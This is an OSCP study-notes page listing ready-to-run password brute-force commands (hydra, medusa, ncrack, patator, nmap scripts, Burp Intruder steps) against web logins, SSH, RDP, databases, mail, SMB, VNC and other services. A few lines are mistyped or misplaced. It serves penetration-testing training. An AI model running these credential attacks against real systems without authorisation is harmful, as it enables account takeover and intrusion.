OSCP Notes
Search…
Brute-force service password

Web

1
hydra 10.0.0.1 http-post-form “/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid” -P /usr/share/wordlists/rockyou.txt -l admin
Copied!

Logins

Use Burp suite.
    1.
    Intecept a login attempt.
    2.
    Right-lick "Send to intruder". Select Sniper if you have nly one field you want to bruteforce. If you for example already know the username. Otherwise select cluster-attack.
    3.
    Select your payload, your wordlist.
    4.
    Click attack.
    5.
    Look for response-length that differs from the rest.

HTTP Generic Brute

wfuzz

HTTP Basic Auth

1
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
2
medusa -h <IP> -u <username> -P <passwords.txt> -M http -m DIR:/path/to/auth -T 10
Copied!

HTTP - Post Form

1
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
Copied!

HTTP - CMS -- (W)ordpress, (J)oomla or (D)rupal or (M)oodle

1
cmsmap -f W/J/D/M -u a -p a https://wordpress.com
Copied!

Hydra attack http get 401 login with a dictionary

1
hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin
Copied!

SSH

1
hydra -l admin -P /usr/share/wordlists/rockyou.txt -o results.txt ssh://$ip
Copied!
1
hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh
Copied!
1
hydra -v -V -u -L users.txt -p "" -t 1 -u $ip ssh
Copied!
1
hydra -l root -P wordlist.txt $ip ssh
Copied!
1
hydra -L userlist.txt -P best1050.txt $ip -s 22 ssh -V
Copied!
1
hydra -l root -P passwords.txt [-t 32] <IP> ssh
Copied!
1
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
Copied!
1
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
Copied!

SNMP

1
hydra -P wordlist.txt -v $ip snmp
Copied!
1
nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
Copied!
1
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp_onesixtyone.txt <IP>
Copied!
1
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp
Copied!

Remote Desktop Protocol

1
ncrack -vv --user admin -P password-file.txt rdp://$ip
Copied!
1
ncrack -vv --user <User> -P pwds.txt rdp://<IP>
Copied!
1
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
2
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
Copied!

AFP

1
nmap -p 548 --script afp-brute <IP>
Copied!

AJP

1
nmap --script ajp-brute -p 8009 <IP>
Copied!

Cassandra Apache

1
nmap --script cassandra-brute -p 9160 <IP>
Copied!

CouchDB

1
msf> use auxiliary/scanner/couchdb/couchdb_login
Copied!

FTP

1
hydra -l root -P passwords.txt [-t 32] <IP> ftp
2
ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]
3
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp
Copied!

IMAP

1
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
2
3
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
4
5
nmap -sV --script imap-brute -p <PORT> <IP>
Copied!

IRC

1
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>
Copied!

ISCSI

1
nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>
Copied!

LDAP

1
nmap --script ldap-brute -p 389 <IP>
Copied!
1
hydra -L users.txt -P passwords.txt $ip ldap2 -V -f
Copied!

Mongo

1
nmap -sV --script mongodb-brute -n -p 27017 <IP>
Copied!

MySQL

1
hydra -L usernames.txt -P pass.txt <IP> mysql
Copied!

OracleSQL

1
pip3 install cx_Oracle --upgrade
2
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
Copied!
1
./odat.py passwordguesser -s $SERVER -d $SID
2
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt
Copied!
1
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>
Copied!
1
nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30
2
3
john hashes.txt
Copied!

POP3

1
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
Copied!
1
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V
Copied!

PostgreSQL

1
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> postgres
Copied!
1
medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgres
Copied!
1
ncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP>:5432
Copied!
1
patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
Copied!
1
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
Copied!

PPTP

1
cat rockyou.txt | thc-pptp-bruter –u <Username> <IP>
Copied!

Redis

1
nmap --script redis-brute -p 6379 <IP>
2
3
hydra –P /path/pass.txt <IP> redis
Copied!

Rexec

1
hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V
Copied!

Rlogin

1
hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V
Copied!

Rsh

1
hydra -L <Username_list> rsh://<Victim_IP> -v -V
Copied!

Rsync

1
nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>
Copied!

RTSP

1
hydra -l root -P passwords.txt <IP> rtsp
Copied!

SMB

1
nmap --script smb-brute -p 445 <IP>
2
3
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
Copied!

Telnet

1
hydra -l root -P passwords.txt [-t 32] <IP> telnet
2
3
ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
4
5
medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet
Copied!

VNC

1
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt -s <PORT> <IP> vnc
2
3
medusa -h <IP> –u root -P /root/Desktop/pass.txt –M vnc
4
5
ncrack -V --user root -P /root/Desktop/pass.txt <IP>:>POR>T
Copied!
1
patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!='Authentication failure' --max-retries 0 –x quit:code=0use auxiliary/scanner/vnc/vnc_login
Copied!
1
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
Copied!

SMTP

1
hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V
Copied!
Last modified 1yr ago